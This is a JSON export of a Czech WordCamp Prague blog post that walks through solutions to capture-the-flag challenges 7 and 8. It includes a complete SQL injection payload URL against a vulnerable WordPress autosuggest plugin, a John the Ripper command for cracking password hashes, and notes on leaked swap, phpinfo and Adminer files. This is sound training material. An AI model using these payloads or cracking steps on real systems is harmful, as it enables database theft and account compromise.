{"id":5873,"date":"2019-02-19T20:25:53","date_gmt":"2019-02-19T19:25:53","guid":{"rendered":"https:\/\/2019.prague.wordcamp.org\/?p=5873"},"modified":"2019-03-02T17:44:51","modified_gmt":"2019-03-02T16:44:51","slug":"capture-the-flag-reseni-flagu-7-8","status":"publish","type":"post","link":"https:\/\/prague.wordcamp.org\/2019\/capture-the-flag-reseni-flagu-7-8\/","title":{"rendered":"Capture the Flag &#8211; \u0159e\u0161en\u00ed flag\u016f 7 &#8211; 8"},"content":{"rendered":"<p>Flag\u016f u\u017e moc nezb\u00fdv\u00e1, poj\u010fme se tedy pod\u00edvat na dal\u0161\u00ed dva.<\/p>\n<div class=\"jetpack-video-wrapper\"><span class=\"embed-youtube\" style=\"text-align:center; display: block;\"><iframe loading=\"lazy\" class=\"youtube-player\" width=\"660\" height=\"372\" src=\"https:\/\/www.youtube.com\/embed\/GfEJpDtHk_I?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=cs-CZ&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\"><\/iframe><\/span><\/div>\n<p><a class=\"btn-pozvanka\" href=\"\/capture-the-flag-reseni-flagu-4-6\/\"><span style=\"color: #fff\">&lt; flagy 4 &#8211; 6<\/span><\/a> <a class=\"btn-pozvanka\" href=\"\/capture-the-flag-reseni-flagu-9\/\"><span style=\"color: #fff\">&gt; flag 9<\/span><\/a><\/p>\n<h3><strong>Flag 7<\/strong>: &#8222;V\u010dera, dnes a z\u00edtra&#8220;<\/h3>\n<p>Tyto flagy byly zam\u011b\u0159eny na datab\u00e1zi. V <strong>robots.txt<\/strong> jsme se dozv\u011bd\u011bli o existenci souboru backup.sql. To v\u0161ak byla o\u0161kliv\u00e1 n\u00e1straha a p\u0159i pokusu o jeho sta\u017een\u00ed jsme z\u00edskali ban. Cesta to ale nabyla \u00fapln\u011b slep\u00e1 a z\u00edskali jsme n\u00e1pov\u011bdu, \u017ee podobn\u00e9 soubory je dobr\u00e9 zkomprimovat &#8211; <strong>backup.sql.gz<\/strong> byl u\u017e na dosah.<\/p>\n<p>P\u0159i prohl\u00eddce dumpu datab\u00e1ze jsme mohli vid\u011bt odkazy na n\u011bkter\u00e9 ji\u017e uloven\u00e9 flagy, ale v tabulce ctf_options jsme nalezli i zvl\u00e1\u0161tn\u00ed vlastnost <strong>flag7_option<\/strong> a prvn\u00ed polovinou tohoto kl\u00ed\u010de.<\/p>\n<p>N\u011bkdy n\u00e1s v\u0161ak star\u00e1 hodnota nezaj\u00edm\u00e1 a cht\u011bli bychom sp\u00ed\u0161e p\u0159\u00edtomnost. C\u00edlem tedy bylo zjistit jakou hodnotu m\u00e1 flag7_option nyn\u00ed. K\u00a0 tomu bylo pot\u0159eba z\u00edskat <strong>p\u0159\u00edstup k \u017eiv\u00e9 datab\u00e1zi<\/strong>. Mo\u017enost\u00ed zde bylo v\u00edce.<\/p>\n<p>Tu prvn\u00ed n\u00e1m prozradil wp-scan, kter\u00fd pouk\u00e1zal na pou\u017eit\u00ed pluginu se <a href=\"https:\/\/www.exploit-db.com\/exploits\/45977\">zranitelnost\u00ed typu SQL injection<\/a>. Po prozkoum\u00e1n\u00ed zraniteln\u00e9ho k\u00f3du a n\u011bkolika pokusech na \u017eiv\u00e9m webu sta\u010dilo jen p\u0159ipravit dotaz, kter\u00fd n\u00e1m hodnotu z datab\u00e1ze vy\u010detl. Drobn\u00fdm z\u00e1drhelem zde mohl b\u00fdt fakt, \u017ee plugin nahrazuje mezery za znak %, to v\u0161ak \u0161lo jednodu\u0161e obej\u00edt n\u00e1hradou mezer za pr\u00e1zdn\u00fd koment\u00e1\u0159 v na\u0161em payloadu.<\/p>\n<p><a href=\"https:\/\/ctf.wordcamppraha.cz\/wp-content\/plugins\/wp-autosuggest\/autosuggest.php?wpas_action=query&amp;wpas_keys=0%27)UNION\/**\/SELECT\/**\/option_value,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\/**\/FROM\/**\/ctf_options\/**\/WHERE\/**\/option_name=%27flag7_option%27%23\">V\u00fdsledn\u00fd dotaz<\/a><\/p>\n<p>K z\u00edsk\u00e1n\u00ed informac\u00ed z datab\u00e1ze bylo samoz\u0159ejm\u011b mo\u017en\u00e9 pou\u017e\u00edt automatizovan\u00fd n\u00e1stroj SQLmap, nicm\u00e9n\u011b cesta s UNION SELECT je trochu elegantn\u011bj\u0161\u00ed.<\/p>\n<p>D\u00edky t\u00e9to zranitelnosti jsme zkompletovali sedmou sadu flag\u016f.<\/p>\n<h3><strong>Flag 8<\/strong>: &#8222;Heslo, heslo, hesl\u00ed\u010dko&#8220;<\/h3>\n<p>P\u0159i zkoum\u00e1n\u00ed datab\u00e1ze bylo mo\u017en\u00e9 narazit na dal\u0161\u00ed z flag\u016f. Zjistili jsme, \u017ee zde existuj\u00ed <strong>3 dal\u0161\u00ed u\u017eivatel\u00e9<\/strong> WordPressu &#8211; flag8a, flag8b a flag8c. Ka\u017ed\u00fd z nich pou\u017e\u00edval jin\u00fd hash hesla &#8211; star\u00e9 jednoduch\u00e9 <strong>MD5<\/strong>, aktu\u00e1ln\u00ed <strong>PHPASS<\/strong> a modern\u00ed <strong>BCRYPT<\/strong>. M\u00e1me tedy 3 hashe a z principu pravidel na\u0161\u00ed CTF sout\u011b\u017ee tak v\u00edme, \u017ee ka\u017ed\u00fd bude slo\u017een z 4 \u010d\u00edslic. Sta\u010dilo je tedy cracknout a to nebylo v\u016fbec slo\u017eit\u00e9.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-7522\" src=\"https:\/\/i0.wp.com\/2019.prague.wordcamp.org\/files\/2019\/02\/ctf-hesla.png?resize=660%2C58&#038;ssl=1\" alt=\"\" width=\"660\" height=\"58\" srcset=\"https:\/\/i0.wp.com\/prague.wordcamp.org\/2019\/files\/2019\/02\/ctf-hesla.png?w=831&amp;ssl=1 831w, https:\/\/i0.wp.com\/prague.wordcamp.org\/2019\/files\/2019\/02\/ctf-hesla.png?resize=300%2C26&amp;ssl=1 300w, https:\/\/i0.wp.com\/prague.wordcamp.org\/2019\/files\/2019\/02\/ctf-hesla.png?resize=768%2C67&amp;ssl=1 768w, https:\/\/i0.wp.com\/prague.wordcamp.org\/2019\/files\/2019\/02\/ctf-hesla.png?resize=500%2C44&amp;ssl=1 500w, https:\/\/i0.wp.com\/prague.wordcamp.org\/2019\/files\/2019\/02\/ctf-hesla.png?resize=825%2C73&amp;ssl=1 825w\" sizes=\"auto, (max-width: 660px) 100vw, 660px\" \/><\/p>\n<p>V uk\u00e1zce jsme na to pou\u017eili n\u00e1stroj John the Ripper s maskou pro 4 \u010d\u00edslice: <code>john --mask=?d?d?d?d --format=raw-md5 soubor-s-hashi.txt<\/code><\/p>\n<p>MD5 byla prolomena ve zlomku vte\u0159iny. PHPASS netrval o mnoho d\u00e9le i kdy\u017e drobn\u00e9 zpomalen\u00ed bylo zn\u00e1t. Na BCRYPT jsme si museli n\u011bkolik minut po\u010dkat.<\/p>\n<p>P\u0159i pou\u017eit\u00ed grafick\u00e9 karty bychom samoz\u0159ejm\u011b m\u011bli v\u00fdsledky mnohem d\u0159\u00edve.<\/p>\n<p>Prolomen\u00edm v\u0161ech 3 hash\u016f jsme z\u00edskali dal\u0161\u00ed kl\u00ed\u010d.<\/p>\n<p>&nbsp;<\/p>\n<p>Alternativn\u00ed cestou k z\u00edskan\u00ed informac\u00ed z datab\u00e1ze byl fakt, \u017ee na webu byl zapomenut\u00fd n\u00e1stroj <a href=\"https:\/\/www.adminer.org\/\">Adminer<\/a>\u00a0(skv\u011bl\u00fd tool, ale stejn\u011b jako PHPmyAdmin ho nen\u00ed rozumn\u00e9 nech\u00e1vat p\u0159\u00edstupn\u00fd). Z wp-scanu jsme d\u00e1le zjistili, \u017ee je na webu p\u0159\u00edstupn\u00fd swap soubor <strong>.wp-config.php.swp<\/strong>, kter\u00fd vznikl p\u0159i \u00faprav\u011b konfigura\u010dn\u00edho souboru na produkci editorem vim. Po sta\u017een\u00ed jsme z\u00edskali p\u0159\u00edstupov\u00e9 \u00fadaje k datab\u00e1zi. Skoro&#8230;<\/p>\n<p>Heslo bohu\u017eel nebylo v souboru p\u0159\u00edtomn\u00e9, proto\u017ee bylo z\u00edsk\u00e1no pomoci prom\u011bnn\u00e9 prost\u0159ed\u00ed &#8222;dbpass&#8220;. Prom\u011bnn\u00e9 prost\u0159ed\u00ed lze v\u0161ak vy\u010d\u00edst z v\u00fdpisu phpinfo(), kter\u00fd jsme ji\u017e d\u0159\u00edve objevili v souboru <strong>phpinfo.php<\/strong>. S t\u011bmito znalostmi tak nebyl probl\u00e9m z\u00edskat p\u0159\u00edstup do datab\u00e1ze mnohem pohodln\u011bji.<\/p>\n<p>Do p\u0159\u00ed\u0161t\u011b n\u00e1m zb\u00fdv\u00e1 u\u017e jen posledn\u00ed flag 9, na kter\u00e9m si mnoho sout\u011b\u017e\u00edc\u00edch vyl\u00e1malo zuby.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a class=\"btn-pozvanka\" href=\"\/vstupenky\/\"><span style=\"color: #fff\">Kupte si vstupenku a p\u0159ij\u010fte na WordCamp<\/span><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Flag\u016f u\u017e moc nezb\u00fdv\u00e1, poj\u010fme se tedy pod\u00edvat na dal\u0161\u00ed dva. &lt; flagy 4 &#8211; 6 &gt; flag 9 Flag 7: &#8222;V\u010dera, dnes a z\u00edtra&#8220; Tyto flagy byly zam\u011b\u0159eny na datab\u00e1zi. V robots.txt jsme se dozv\u011bd\u011bli o existenci souboru backup.sql. To v\u0161ak byla o\u0161kliv\u00e1 n\u00e1straha a p\u0159i pokusu o jeho sta\u017een\u00ed jsme z\u00edskali ban. Cesta &hellip; <a href=\"https:\/\/prague.wordcamp.org\/2019\/capture-the-flag-reseni-flagu-7-8\/\" class=\"more-link\">Pokra\u010dov\u00e1n\u00ed textu <span class=\"screen-reader-text\">Capture the Flag &#8211; \u0159e\u0161en\u00ed flag\u016f 7 &#8211; 8<\/span><\/a><\/p>\n","protected":false},"author":5814035,"featured_media":5583,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"video","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[1230900],"tags":[],"class_list":["post-5873","post","type-post","status-publish","format-video","has-post-thumbnail","hentry","category-nezarazene","post_format-post-format-video"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/prague.wordcamp.org\/2019\/files\/2019\/01\/ctf-img.jpg?fit=600%2C335&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pab3ys-1wJ","_links":{"self":[{"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/posts\/5873","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/users\/5814035"}],"replies":[{"embeddable":true,"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/comments?post=5873"}],"version-history":[{"count":4,"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/posts\/5873\/revisions"}],"predecessor-version":[{"id":7523,"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/posts\/5873\/revisions\/7523"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/media\/5583"}],"wp:attachment":[{"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/media?parent=5873"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/categories?post=5873"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prague.wordcamp.org\/2019\/wp-json\/wp\/v2\/tags?post=5873"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}